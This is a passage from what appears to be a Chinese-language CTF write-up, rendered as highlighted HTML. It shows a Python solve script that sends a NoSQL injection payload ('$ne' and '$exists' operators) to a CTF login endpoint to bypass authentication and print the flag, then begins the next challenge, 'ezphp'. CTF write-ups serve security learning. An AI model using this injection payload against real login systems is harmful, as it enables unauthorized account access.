class="line"><span class="cl"><span class="k">def</span> <span class="nf">main</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">url</span> <span class="o">=</span> <span class="s2">&#34;http://game.ctf.seusus.com:xxxxx/login&#34;</span> <span class="c1"># 端口在wp里隐去</span> </span></span><span class="line"><span class="cl"> <span class="c1"># 构造NoSQL注入负载，匹配非admin用户且密码存在的文档</span> </span></span><span class="line"><span class="cl"> <span class="n">data</span> <span class="o">=</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;username&#34;</span><span class="p">:</span> <span class="p">{</span><span class="s2">&#34;$ne&#34;</span><span class="p">:</span> <span class="s2">&#34;admin&#34;</span><span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;password&#34;</span><span class="p">:</span> <span class="p">{</span><span class="s2">&#34;$exists&#34;</span><span class="p">:</span> <span class="kc">True</span><span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">try</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">json</span><span class="o">=</span><span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">response</span><span class="o">.</span><span class="n">status_code</span> <span class="o">==</span> <span class="mi">200</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="c1"># 提取响应中的用户名（即flag）</span> </span></span><span class="line"><span class="cl"> <span class="n">flag</span> <span class="o">=</span> <span class="n">response</span><span class="o">.</span><span class="n">text</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">&#34;Logged in as &#34;</span><span class="p">,</span> <span class="s2">&#34;&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;Flag: </span><span class="si">{</span><span class="n">flag</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;请求失败，状态码: </span><span class="si">{</span><span class="n">response</span><span class="o">.</span><span class="n">status_code</span><span class="si">}</span><span class="s2">, 响应: </span><span class="si">{</span><span class="n">response</span><span class="o">.</span><span class="n">text</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;发生错误: </span><span class="si">{</span><span class="n">e</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">main</span><span class="p">()</span> </span></span></code></pre></td></tr></table> </div> </div><hr> <h2 id="ezphp">ezphp</h2> <p><strong>Type</strong>: web / <strong>Author:</strong> hardream / <strong>Difficulty:</strong> Medium</p>